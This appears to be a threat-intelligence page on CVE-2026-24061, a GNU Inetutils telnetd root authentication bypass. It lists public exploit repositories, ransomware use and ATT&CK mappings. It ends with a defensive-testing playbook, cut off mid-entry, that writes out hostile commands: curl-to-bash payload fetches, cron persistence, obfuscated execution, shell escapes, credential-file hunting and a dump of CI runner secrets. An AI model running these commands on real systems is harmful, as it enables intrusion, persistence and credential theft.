CVE-2026-24061

CRITICAL CISA KEV EXPLOIT POC TTE Zero-Day Pub 21/01 Upd 29/09

Overview

This vulnerability is an authentication bypass in the telnetd daemon of GNU Inetutils versions up to 2.7. The root cause lies in improper handling of the USER environment variable, where passing a specially crafted value "-f root" bypasses normal authentication checks. The affected component is the telnetd service responsible for remote login sessions.

Vulnerability Description

telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable.

Impact

An unauthenticated remote attacker can gain root-level access on the affected system by exploiting this flaw, effectively bypassing all authentication controls. This allows full system compromise including arbitrary command execution with administrative privileges. No prior credentials or user interaction are required, enabling direct unauthorized access to sensitive system resources and potential lateral movement within a network environment.

Solution

Upgrade GNU Inetutils to a version later than 2.7 where this vulnerability is addressed, as recommended by the GNU project advisory available at https://www.gnu.org/software/inetutils/. Debian users should apply security updates for Debian Linux 11.0 as provided by the Debian security team. Refer to the openwall security mailing list announcements from January 20, 2026, for detailed patch instructions and mitigation steps.

EPSS vs KEV Prediction — Evolution (30 days)

Affected Products (2)

Vendor Product Version CPE
gnu Gnu Inetutils All cpe:2.3:a:gnu:inetutils:*:*:*:*:*:*:*:*
debian Debian Debian Linux 11.0 cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061
exploits/linux/telnet/gnu_inetutils_auth_bypass
jheysel-r7, Kyu Neushwaistein Unknown - View

ExploitDB (1)

Title Author Type Platform Date Link
GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation aliguliyev local linux - View

GitHub PoCs (82)

Repository Author Stars Forks Date Link
jacubes/CVE-2026-24061
CVE-2026-24061 exploit PoC
jacubes 826 15 2026-03-08 View
SafeBreach-Labs/CVE-2026-24061
Exploitation of CVE-2026-24061
SafeBreach-Labs 208 47 2026-01-22 View
JayGLXR/CVE-2026-24061-POC
JayGLXR 68 10 2026-01-22 View
parameciumzhang/Tell-Me-Root
基于cve-2026-24061 telnet远程认证绕过漏洞的批量检测利用工具
parameciumzhang 21 4 2026-01-22 View
ZeroDayEvil/CVE-2026-24061
ZeroDayEvil 22 2 2026-09-28 View
ekomsSavior/telnet_scan
scanner/exploiter CVE-2026-24061 & CVE-2026-32746
ekomsSavior 12 6 2026-03-26 View
Lingzesec/CVE-2026-24061-GUI
CVE-2026-24061 GNU Inetutils telnetd 身份验证绕过漏洞检测与利用 GUI 工具
Lingzesec 17 1 2026-01-26 View
Chocapikk/CVE-2026-24061
Chocapikk 12 3 2026-01-22 View
TryA9ain/CVE-2026-24061
CVE-2026-24061 Batch Scanning Tool
TryA9ain 10 4 2026-01-22 View
leonjza/inetutils-telnetd-auth-bypass
A small docker lab to play with cve-2026-24061, the inetutils-telnetd authentication bypass.
leonjza 12 0 2026-01-21 View
0p5cur/CVE-2026-24061-POC
CVE-2026-24061's poc : a critical authentication bypass in telnetd leading to RCE as root Affects systems with telnetd v...
0p5cur 8 3 2026-01-24 View
h3athen/CVE-2026-24061
CVE-2026-24061 - Exploit
h3athen 8 1 2026-01-22 View
tc4dy/CVE-2026-24061-PoC-Exploit
CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass Exploit - Full Control with CRLF injection via NEW_ENVIRON leads to a...
tc4dy 8 0 2026-06-06 View
sh4den/CVE-2026-24061
Proof of Concept: CVE-2026-24061 is a critical authentication bypass vulnerability in GNU inetutils-telnetd allowing una...
sh4den 6 1 2026-01-23 View
SystemVll/CVE-2026-24061
Proof of Concept: CVE-2026-24061 is a critical authentication bypass vulnerability in GNU inetutils-telnetd allowing una...
SystemVll 5 1 2026-01-23 View
franckferman/CVE-2026-24061
GNU InetUtils telnetd - Unauthenticated Remote Root via NEW-ENVIRON Variable Injection.
franckferman 5 0 2026-02-02 View
shivam-bathla/CVE-2026-24061-setup
Docker setup for CVE-2026-24061
shivam-bathla 4 1 2026-01-24 View
balgan/CVE-2026-24061
inetutils-telnetd Authentication Bypass - working
balgan 4 0 2026-01-23 View
ibrahmsql/CVE-2026-24061-PoC
CVE-2026-24061 PoC and walkthrough
ibrahmsql 4 0 2026-02-02 View
madfxr/Twenty-Three-Scanner
CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass
madfxr 4 0 2026-01-24 View
K3ysTr0K3R/CVE-2026-24061
A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass
K3ysTr0K3R 3 0 2026-06-08 View
xuemian168/CVE-2026-24061
xuemian168 3 0 2026-01-23 View
duy-31/CVE-2026-24061---telnetd
Bypass d’authentification Telnet menant à un accès root
duy-31 2 1 2026-01-22 View
stoerti2/Abyssal
Abyssal is a high-performance Telnet vulnerability scanner for CVE-2026-24061, delivering root shells on vulnerable sys...
stoerti2 0 2 2026-07-10 View
RStephanH/vuln-deb
A vulnerable Debian-based VM for practising exploitation of CVE-2026-24061
RStephanH 2 0 2026-04-13 View
MY0723/GNU-Inetutils-telnet-CVE-2026-24061-
GNU Inetutils telnet远程认证绕过漏洞(CVE-2026-24061),该漏洞源于 GNU Inetutils telnetd 组件中对环境变量处理不当,攻击者可利用该漏洞,通过构造恶意的 USER 环境变量并发送至受影响...
MY0723 1 1 2026-01-28 View
dotelpenguin/telnetd_CVE-2026-24061_tester
Checks for CVE-2026-24061 Telnetd exploit
dotelpenguin 1 1 2026-01-28 View
yanxinwu946/CVE-2026-24061--telnetd
GNU InetUtils telnetd 远程身份认证绕过漏洞(CVE-2026-24061),此漏洞主要影响 telnetd 在调用系统 /usr/bin/login 程序时,未对从客户端 USER 环境变量传入的用户名做过滤,直接拼接...
yanxinwu946 2 0 2026-01-22 View
X-croot/CVE-2026-24061_POC
POC Script for CVE-2026-24061 (GNU Telnetd Exploit)
X-croot 2 0 2026-02-01 View
Mr-Zapi/CVE-2026-24061
Nuclei template for CVE-2026-24061
Mr-Zapi 1 1 2026-01-24 View
JakeSwiz/telnet-inetutils-auth-bypass-CVE-2026-24061
This is a simple PoC that allows you to highlight the severity of the ongoing and actively exploited Telnet bug that is ...
JakeSwiz 1 0 2026-01-31 View
infat0x/CVE-2026-24061
CVE-2026-24061 PoC
infat0x 1 0 2026-01-25 View
FurkanKAYAPINAR/CVE-2026-24061-telnet2root
FurkanKAYAPINAR 1 0 2026-01-27 View
setuju/telnetd
Idk what to do here, ill edit soon, but its for the telnetd CVE-2026-24061
setuju 1 0 2026-03-03 View
0xBlackash/CVE-2026-24061
CVE-2026-24061
0xBlackash 1 0 2026-03-09 View
Mefhika120/Ashwesker-CVE-2026-24061
CVE-2026-24061
Mefhika120 0 1 2026-01-25 View
androidteacher/CVE-2026-24061-PoC-Telnetd
androidteacher 0 1 2026-01-27 View
cumakurt/tscan
Telnetd Auth Bypass Scanner (CVE-2026-24061) A Python-based scanner for detecting and exploiting the CVE-2026-24061 vul...
cumakurt 1 0 2026-01-27 View
monstertsl/CVE-2026-24061
CVE-2026-24061 漏洞检测工具
monstertsl 1 0 2026-01-23 View
Yoksulcvt/CVE-2026-24061-Telnet-Authentication-Bypass
Telnet 2.7 Authentication Bypass and Privilege Escalation | Telnet 2.7 Kimlik doğrulama Zafiyeti Ve Yetki Yükseltme Sald...
Yoksulcvt 0 0 2026-10-07 View
skyejacobson/CyberhawksLab-telnetCVE
Writeup/finding of CVE-2026-24061 within the Cyberhawks lab
skyejacobson 0 0 2026-09-08 View
Ish3ng0m4/CVE-2026-24061-Telnetd
CVE-2026-24061 GNU Inetutils Telnetd Authentication Bypass
Ish3ng0m4 0 0 2026-09-01 View
iLokaas/CVE-2026-24061-payload
A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass
iLokaas 0 0 2026-08-28 View
s-vx/CVE-2026-24061
Auth Bypass in inetutils-telnetd
s-vx 0 0 2026-07-25 View
harygovind/CVE-2026-24061
CVE-2026-24061-PoC
harygovind 0 0 2026-07-06 View
kyukazamiqq/CVE-2026-24061
kyukazamiqq 0 0 2026-06-27 View
Cosm3No1de/htb-orion-writeup
Hack The Box - Orion (Easy) | CVE-2025-32432 & CVE-2026-24061
Cosm3No1de 0 0 2026-06-27 View
anxs3c/CVE-2026-24061-GNU-InetUtils-telnetd
GNU-InetUtils-telnetd-Authentication-Bypass-Vulnerability
anxs3c 0 0 2026-06-08 View
akpmarcelin/CVE-2026-24061-lab
akpmarcelin 0 0 2026-06-17 View
achnouri/CVE-2026-24061-GNU-InetUtils-telnetd
GNU-InetUtils-telnetd-Authentication-Bypass-Vulnerability
achnouri 0 0 2026-06-08 View
ahmadsadeeq/TelnetdBypass-
CVE-2026-24061 — GNU InetUtils Telnetd Authentication Bypass Scanner
ahmadsadeeq 0 0 2026-06-01 View
r00tuser111/CVE-2026-24061
CVE-2026-24061 环境
r00tuser111 0 0 2026-01-23 View
z3n70/CVE-2026-24061
z3n70 0 0 2026-01-24 View
midox008/CVE-2026-24061
GNU Inetutils telnetd Remote Authentication Bypass
midox008 0 0 2026-01-24 View
BrainBob/CVE-2026-24061
BrainBob 0 0 2026-01-24 View
BrainBob/Telnet-TestVuln-CVE-2026-24061
BrainBob 0 0 2026-01-24 View
Alter-N0X/CVE-2026-24061-POC
CVE-2026-24061 - GNU InetUtils telnetd authentication bypass POC + Docker lab environment for testing
Alter-N0X 0 0 2026-01-24 View
typeconfused/CVE-2026-24061
GNU telnetd service from GNU InetUtils authentication-bypass
typeconfused 0 0 2026-01-25 View
ms0x08-dev/CVE-2026-24061-POC
ms0x08-dev 0 0 2026-01-25 View
punitdarji/telnetd-cve-2026-24061
punitdarji 0 0 2026-01-26 View
XsanFlip/CVE-2026-24061-Scanner
CVE-2026-24061-Scanner by XsanLahci
XsanFlip 0 0 2026-01-26 View
LucasPDiniz/CVE-2026-24061
Vulnerability in GNU InetUtils telnetd Enables Remote Root Access
LucasPDiniz 0 0 2026-01-26 View
novitahk/Exploit-CVE-2026-24061
Payload CVE-2026-24061
novitahk 0 0 2026-01-27 View
Gabs-hub/CVE-2026-24061_Lab
Lab to show the CVE-2026-24061
Gabs-hub 0 0 2026-01-28 View
0x7556/CVE-2026-24061
CVE-2026-24061 Telnet RCE Exploit For Linux MacOS Windows
0x7556 0 0 2026-01-28 View
Parad0x7e/CVE-2026-24061
Parad0x7e 0 0 2026-01-28 View
buzz075/CVE-2026-24061
Scanner for CVE-2026-24061
buzz075 0 0 2026-01-31 View
obrunolima1910/CVE-2026-24061
🚨 Exploit CVE-2026-24061, a critical remote authentication bypass in GNU inetutils-telnetd, for instant root shell acces...
obrunolima1910 0 0 2026-02-03 View
canpilayda/inetutils-telnetd-cve-2026-24061
canpilayda 0 0 2026-02-04 View
killsystema/scan-cve-2026-24061
killsystema 0 0 2026-02-05 View
nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector
A passive detection tool for identifying potential exposure to CVE-2026-24061 in GNU inetutils telnet installations
nrnw 0 0 2026-02-06 View
tiborscholtz/CVE-2026-24061
A lightweight Docker lab for experimenting with Telnet protocol negotiation, explained in the CVE-2026-24061 exploit, wh...
tiborscholtz 0 0 2026-02-14 View
HD0x01/CVE-2026-24061-NSE
The script performs a full Telnet negotiation mirroring the exact byte sequence of a real telnet -a client session.
HD0x01 0 0 2026-03-16 View
lavabyte/telnet-CVE-2026-24061
lavabyte 0 0 2026-02-04 View
scumfrog/cve-2026-24061
CVE-2026-24061 PoC
scumfrog 0 0 2026-02-06 View
athack-ctf/chall2026-telneted
[AtHack 2026] Pwn challenge about telnetd CVE-2026-24061
athack-ctf 0 0 2026-02-15 View
przemytn/CVE-2026-24061
CVE-2026-24061 PoC - telnetd auth bypass
przemytn 0 0 2026-03-18 View
SeptembersEND/CVE--2026-24061
A docker image for CVE-2026-24061 in InetUtils telnetd.
SeptembersEND 0 0 2026-02-02 View
mbanyamer/CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell-
mbanyamer 0 0 2026-02-18 View
0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061
This is a simple PoC that allows you to highlight the severity of the ongoing and actively exploited Telnet bug that is ...
0xXyc 0 0 2026-01-31 View
Remnant-DB/CVE-2026-24061
CVE-2026-24061 Lab
Remnant-DB 0 0 2026-03-03 View
Risma2025/CVE-2026-24061-GNU-InetUtils-telnetd-Authentication-Bypass-Vulnerability
Risma2025 0 0 2026-04-05 View
Exploited in Wild CONFIRMED
Ransomware IN USE
Attacker Interest VERY HIGH
Sightings Considerable activity

Ransomware Groups 1

qilin
CONFIRMED
2304 victims
ransomware.live
2026-09-21

Threat Feed

35 events
2026-10-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-21
Exploited by qilin

Ransomware group known to exploit this vulnerability. Tools: Cobalt Strike, EDRSandBlast, EasyUpload.io, Evilginx, Kali Linux (2304 known victims)

2026-09-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-09-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-31
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-28
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-08-27
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-08-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-22
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-01-26
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2026-01-26
Exploit Published (1 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

2026-01-21
PoC Published (82 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

Detected as Exploited in the Wild (56 sightings)

Active exploitation confirmed with 56 sighting(s)

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Authentication Bypass
97% auth_bypass
Privilege Escalation
35% privilege_escalation

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1053.003 Cron Kill Chain execution, persistence, privilege-escalation Linux, macOS, ESXi
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-137 Parameter Injection
40%
Medium Medium
CAPEC-174 Flash Parameter Injection
40%
High Medium
CAPEC-88 OS Command Injection
40%
High High
CAPEC-41 Using Meta-characters in E-mail Headers to Inject Malicious Payloads
30%
High High
CAPEC-460 HTTP Parameter Pollution (HPP)
30%
— Medium

Red Team Playbook

62 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1053.003 Cron - Add script to /etc/cron.d folder Linux Shell Privileged
This test adds a script to /etc/cron.d folder configured to execute on a schedule.
Command (Shell)
echo "#{command}" > /etc/cron.d/#{cron_script_name}
T1053.003 Cron - Add script to /var/spool/cron/crontabs/ folder Linux Bash Privileged
This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
Command (Bash)
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
T1053.003 Cron - Add script to all cron subfolders Linux, macOS Bash Privileged
This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
Command (Bash)
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
T1053.003 Cron - Replace crontab with referenced file Linux, macOS Shell
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
Command (Shell)
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1552.001 Access Drone CI Config File Linux, macOS Shell
Find Drone CI configuration files (.drone.yml), which may contain credentials, secrets, or sensitive environment variables used in Drone CI/CD pipelines.
Command (Shell)
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
T1552.001 Access Gitlab CI Config File Linux, macOS Shell
Find GitLab CI configuration files (.gitlab-ci.yml), which may contain credentials, secrets, or sensitive environment variables.
Command (Shell)
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
T1552.001 Access Jenkinsfile Linux, macOS Shell
Find Jenkinsfiles, which may contain credentials, secrets, or sensitive environment variables used in Jenkins CI/CD pipelines.
Command (Shell)
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
T1552.001 Access Travis CI Config File Linux, macOS Shell
Find Travis CI configuration files (.travis.yml), which may contain credentials, secrets, or sensitive environment variables.
Command (Shell)
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Dump GitHub Actions Runner Environment Variables from procfs Linux Bash
Locates GitHub Actions runner processes (Runner.Worker, Runner.Listener, runsvc, run.sh) and reads their environment variables from /proc/<pid>/environ, filtering for keys containing "env" or "ssh". This mirrors TeamPCP malware behavior that harvests credentials and secrets...
Command (Bash)
for pid in $(pgrep -f 'Runner.Worker|Runner.Listener|runsvc|run.sh' 2>/dev/null); do tr '\0' '\n' < /proc/$pid/environ 2>/dev/null | grep -iE 'env|ssh'; done
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find .env Files Containing Application Credentials Linux, macOS Shell
Searches common web application and service directories for .env files (.env, .env.local, .env.production, .env.development, .env.staging) that may contain credentials such as API keys, database passwords, and service secrets. Adversaries targeting web servers or...
Command (Shell)
find #{file_path} -maxdepth 6 -name "#{filename}" -type f #{optional_flags} 2>/dev/null
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path} -path '*/.aws/#{filename}' -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path} -path '*/.azure/#{filename}' -type f #{optional_flags} 2>/dev/null
T1552.001 Find Docker credentials Linux, macOS Shell
Find local Docker credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path} -path '*/.docker/#{filename}' -type f #{optional_flags} 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path} -path '*/.config/gcloud/#{filename}' -type f #{optional_flags} 2>/dev/null
T1552.001 Find HashiCorp Vault token files Linux, macOS Shell
